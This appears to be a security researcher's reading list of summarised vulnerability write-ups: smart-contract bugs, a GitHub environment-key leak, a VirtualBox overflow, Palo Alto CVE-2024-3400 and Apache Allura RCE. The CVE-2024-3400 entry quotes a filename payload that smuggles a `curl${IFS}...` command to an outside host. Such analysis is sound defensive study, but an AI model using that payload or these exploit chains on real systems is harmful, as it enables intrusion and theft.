Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Curvance: Invariants unleashed- 1405

Nat Chin - Trail of Bits    Reference →Posted 1 Year Ago
  • Curvance appears to be a lending and borrowing protocol. In order to ensure their protocol was secure, they asked Trail of Bits to write a large amount of fuzz tests for their project. This included raw fuzzing looking for crashes and also invariant fuzzing to ensure that the protocol works as intended.
  • What are invariants? They are core properties of the system that should always hold true. I felt that the invariants for this went more into the actual functionality as opposed to high level invariants, but that is just semantics. As an example, "Calls to createLock with an amount value less than WAD fail" for the VeCVE functional invariants.
  • Many of the invariants were extremely specific to the functionality. It felt like "what would be bad if XXX went wrong". So, once the invariants were hooked into the Echidna fuzzer with a sufficient harness, they let it go to work. They found 12 unique bugs from this, including a few fairly catastrophic vulnerabilities. To me, the main reason this works is that the validations for specific pieces of functionality were so specific. People think fuzzing is the easy way, which really isn't the case.
  • The report notes that there are some limitations with this setup though. Oracle prices, and external token interactions are good example of large state explosion if not properly restricted. So, they had to really simplify this setup to make the fuzzing work. Overall, a good reference for writing deep invariants in order to find deep bugs!

mXSS cheatsheet- 1404

Sonar Source    Reference →Posted 1 Year Ago
  • Mutation XSS (mXSS) is a type of XSS that occurs from browser quirks in HTML parsing. In particular, how the browser will rewrite HTML that is considered invalid or what happens when they change context.
  • The HTML specification is long so this is a nice cheatsheet for testing for these types of issues. Within many of the SonarSource teams XSS issues lately, they abuse the different types of contexts: HTML, math and SVG - to cause lots of problems. Nothing in particular stands out to me but this is worth saving as a resource.

Send()-ing Myself Belated Christmas Gifts - GitHub.com's Environment Variables & GHES Shell- 1403

Ngo Wei Lin    Reference →Posted 1 Year Ago
  • GitHub Enterprise Servers (GHES) is a locally hosted version of Github that teams can run. It runs functionality the same as the regular Github service and is written in Ruby.
  • Reflections in Ruby are used for calling arbitrary functions on an Object. This works because there is an inheritance structure similar to that of JavaScript. By calling Kernel#send() on an object, arbitrary functions can be called on an object. The author decided to look into potential sinks where this could be called, since it's known to be an RCE sink.
  • While doing research into the possible exploit methods, they noticed that RCE would require at least two controlled parameters - they didn't see any paths for one or zero. They found a case of reflection with zero inputs at Organizations::Settings::RepositoryItemsComponent. From there, they wrote a script to enumerate the available functions and variables that would be interesting to look at within the Ruby console.
  • While testing this, they noticed a couple of weird things. First, even if there are required parameters for a call, the function can still be called with default values. Additionally, the object in question with reflection issues had 5K different functions!? While conducting local testing there GHES broke. While it was fixing itself up they decided to mess around on standard Github.
  • The function nw_fsck() was calling spawn_git. This returned a list of environmental variables for the Github server itself! To the authors surprise, this contained a lot of production access keys. How did this happen!? Upon finding this, they reported the vulnerability to Github to fix up.
  • Ruby on Rails uses a serialized session that is signed. If this can be tampered with then RCE can be trivially obtained using Ruby deserialization primitives, such as with iblue's technique. Having access to the keys is a terrible primitive as a result.
  • The difference between a local and a global instance of Github is interesting in this context. Accessing data globally is scary and all angles must be considered, especially with things like Github Actions. The enumeration of exploit paths for the deserialization was interesting to me in the post as well. The bug itself was simple but finding a meaningful impact was very difficult. Overall, great post for a super impactful bug!

How 18-Year-Old Me Discovered a VirtualBox VM Escape Vulnerability- 1402

Jonathan Jacobi    Reference →Posted 1 Year Ago
  • The author of this post decided to take a trip down memory lane by reviewing a vulnerability they found in VirtualBox 5 years ago. The post is heavy into the methodology, which I always appreciate!
  • While doing recon and looking at previous research, they came to the conclusion that the VBVA (Virtual Box Video Acceleration) was good to look at. Why? One thing is that video subsystems are known to be hard to implement securely not just in VBox but other virtualization software as well. This is because they are many handling of pointers, offsets and things, which can lead to memory corruption.
  • To look at the source code, they decided to look for sources. Any input that was directed controlled by users within the virtual machine was considered. They were curious about how integers overflows were being prevented. One way of doing this is by saving the result of two smaller integers into a single integer, such as uint16_t into uint32_t. Although this is fine in most cases, there is an additional multiplication by 4, that can lead to an overflow occurring.
  • What can we do with this? The height * width * 4 value is used for a sanity check to ensure we're not writing outside the bounds of the VRAM buffer. However, since this check will overflow, we can cause memory corruption in future writes. They noticed that the function crMClrFillMem() for filling in a rectangle img can be used to write outside of the buffer! The OOB write has a controlled value and a controlled offset, which is an amazing primitive. This also grants an OOB via the same bug.
  • Overall, a good post on the discovery of a super powerful vulnerability within VBox. To me, I don't like the preventative strategy of overflows used, as it seems prone to errors with extra addition being done.

Non-Compliant, So What?- 1401

QuarksLab    Reference →Posted 1 Year Ago
  • Cryptography feels like black magic. When auditing code at QuarksLab, there are many little things that they report but don't just kill the security of the implementation immediately. In this article, they explain the little things and why they're still important to fix.
  • Not standard means that something out of the ordinary is being done. For instance, using a untested/less used primitive like a MARs cipher. Although they may not pose a threat at the moment, things that are not battle tested may have unexpected issues.
  • Non-standard usage is using a primitive in a weird/wrong way. An common example of this is using a bad random number generator. Or, generating an IV via a key generation function.
  • Next, they talk about things that are Low security, still technically secure. These are things that have no impact at the moment but may in the future or if changes are made. An example of this is using RSA keys that are smaller than the maximum amount that has been currently factored or using a non-standard amount of iterations (200 vs 210 for instance).
  • The most interesting to me was safety net saves all. This is where there is a vulnerability in part of the implementation but some feature, intended or unintended, or use case saves the day. This is akin to having multiple walls that are low security.
  • I've seen the safety net saves all on multiple occasions but absolutely hate it. A section of code may be secure given the current use case but insecure in another. Down the road, the developers may use it in the insecure way, forgetting what was said about it.
  • At the end, they mention that some clients have asked them to change the attacker model to make the system feel more secure. For instance, if the server in the middle was fully trusted, using a third party solution or a plain rewrite.
  • Overall, a good post on minimal impact issues and how to talk about them with clients.

Aptos Security Page- 1400

Aptos    Reference →Posted 1 Year Ago
  • Every programming language has its pros and cons in terms of security. This article is from Aptos about writing secure smart contracts within the MOVE programming language.
  • Access control is the first thing listed with several sub categories - probably the most important thing to look out for. MOVE, similar to Solana, accepts a signer object, for the calling user. Using this in the proper places is important.
  • Similar to Solidity, different functions have different visibilities. entry is used for entrypoints into modules. friend should be used for functions to be accessible by specific modules, which I think are other things. view functions are for only reading data. public functions are accessible from through modules as well. private are only accessible by the module itself.
  • The next category stems from types and data structures. First, they talk about generic type checks. When taking in a generic type, proper validation to ensure there are weird type confusions. phantom data types should be used to prevent this.
  • The other data structure related item is resource management and unbounded execution. Being careful with unbounded data storage, unbounded array iteration and other things.
  • Move abilities are a set of permissions that control the actions on data structures. These act as defense-in-depth measures to ensure specific operations do not happen. The four capabilities are copy, drop, store and key.
  • Now, for something specific to Aptos. When creating an object the ConstructorRef should not be controllable by end users or passed around. If it is, then resources can be added to it or changed directly in storage.
  • Individual objects should also be stored in separate objects. Otherwise, transferring of ownership of the account will result in the whole ownership of it to the new user.
  • The final section is about business logic. Aptos is still vulnerable to oracle manipulation and frontrunning. Overall, a good overview of Aptos security for somebody who has never looked into it.

Hedgey Finance Hack- 1399

CubeAI    Reference →Posted 1 Year Ago
  • Hedgey Finance is a token vesting and locking tool. I linked one article but I also like the Rekt News article.
  • During a campaign creation, the user transfers the locked tokens to a smart contract for usage by the sending contract. When doing this, the contract gives an allowance to a manager contract to spend the funds. If a user cancels the campaign prior to it starting, they are refunded all of the value they put in.
  • The vulnerability is that the allowance is not revoked when canceling the campaign. So, this leads to a super easy to exploit double spend.
  • The attacker wanted to maximize the damage that was done. So, they took out a USDC flash laon from balancer to start and then cancel the campaign. In order to avoid bots frontrunning the exploit, they did the steps above in the first transaction then waited a bit. After waiting, they abused the allowance of $1.3M from the cancellation to steal all of the funds. Boom, money stolen!
  • This had been previously audited but the bug was not found. I had never seen the pattern of a smart contract giving an allowance out to users. Overall, a fairly simple approval bug in a weird context.

Issues in Certain Forks of Gains Network- 1398

Zellic    Reference →Posted 1 Year Ago
  • Gains is a leverage-trading platform. In particular, users can provide small amount of funds yet still gain high exposure to a given asset. The leverage portion allows for gains or losses of multiple times. There are two special types of orders: stop loss and take profit. Stop loss will remove the current position after an X% decrease in price while the take profit will cash out once a specific price point has been hit.
  • On Gains, regardless if it's a long or short, there are three types of orders:
    • Market: Open a trade immediately.
    • Limit: Go long on a lower price than present or reversed for short.
    • Stop Limit: Go long on a higher price than present or reversed for short.
  • The trade struct has several fields, including tp for take-profit and sl for stop loss profit. If the price was 1K with a 5x leverage and the SL was 900 with a price below that, then the return would be -50. All of this is standard to the protocol.
  • In the function that does the calculations above, there is some logic for figuring out payouts which deals with negative numbers. If the field t.openPrice is t.sl, then the current pricing model breaks. As a result, if the token drops on a long then we'd gain unintended profit. By setting up parameters for the trade in a very specific way, including specific order types, it was possible to trigger this condition.
  • After finding this bug they kept looking and found another one! The function _currentPercentProfit casts currentPrice (which is included by end users) from an unsigned integer to a signed integer. By specifying the price to be extremely large, it would underflow to a negative value! Since we're dealing with shorts and longs, it was
  • After doing both of these tricks, the position could be immediately closed for a 900% profit. Crazily enough, the profit didn't depend on the movement of the token because of the confusion between the different types.
  • To fix both of the bugs, an invariant check no sl/tp to be within the proper bounds was done. I'm hopeful they introduced more patches than just invariant checks but invariant checks are amazing for killing exploit paths like this one.
  • With my inexperience with leveraged trading and the Gains network logic, I found the first bug to understand. However, it seems like it was just a logic flaw that broke an invariant of the protocol. To me, it was interesting to see can we make the value greater than this other value because it would be bad which led them to the bugs in the end. Good finds!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)- 1397

WatchTowr    Reference →Posted 1 Year Ago
  • While fuzzing the Global Protect firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID parameter, some strange logs showed up - failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins!
  • The EOF indicates that it's reading a file. Since we added the semicolon, there's no file with that inside of it. Adding in a slash for a directory gives us the nicer error failed to load file. Sick! It's reading a file and we're able to control this. What about directory traversal?
  • If it cannot find the directory, then it will attempt to create it. If the file doesn't exist, then it simply creates a zero byte file with the filename intact. By itself, this doesn't seem to have much of an impact. However, weird primitives lead to the breaking of security assumptions that may no longer be true. So, all we have to do is find some rule that we can violate.
  • Within the telemetry code, it is injesting log files. When doing this, it creates a curl command with shell capabilities to transfer the file. Now, there is an arbitrary file name in a bash command. That previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within the cookie values. So, we have to get creative!
  • {IFS} can be used for a space within bash. So, if we create a filename with bash metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will create an outbound curl request. Neat!
  • Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application.
  • Overall, an awesome post on a bizarre command injection. This took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is useful but it's not a launch and let go. Instead, reading the error messages, responses and all other available information to look for weird behavior is worth while.

Dangerous Import: SourceForge Patches Critical Code Vulnerability- 1396

Stefan Schiller - Sonar Source    Reference →Posted 1 Year Ago
  • Apache Allura is used by many popular products. It is a site that managers source code, bug reports, discussions and many other things. SourceForge uses this under the hood.
  • Within the discussion area, users can import/export arbitrary files. Even though it should only ever be a URL, the file:// URI can be used. The file is added to the file locally, giving both an arbitrary file read and SSRF in one bug.
  • Using this, it's possible to read /etc/passwd. However, we can do better than that! Allura contains a global session key used to sign the sessions, which are pickle serialized. By reading the configuration file, it's possible to steal the key! Since we can now sign the pickle serialized files, we get trivial code execution.
  • I think the remediation is interesting. First (and most obvious) the URL is checked to be either http/https. Additionally, there are SSRF checks to ensure that it's not a local IP. Second, the pickle session storage was replaced with a JWT implementation to prevent RCE via this ever again. Overall, a simple bug leads to RCE in a popular thing.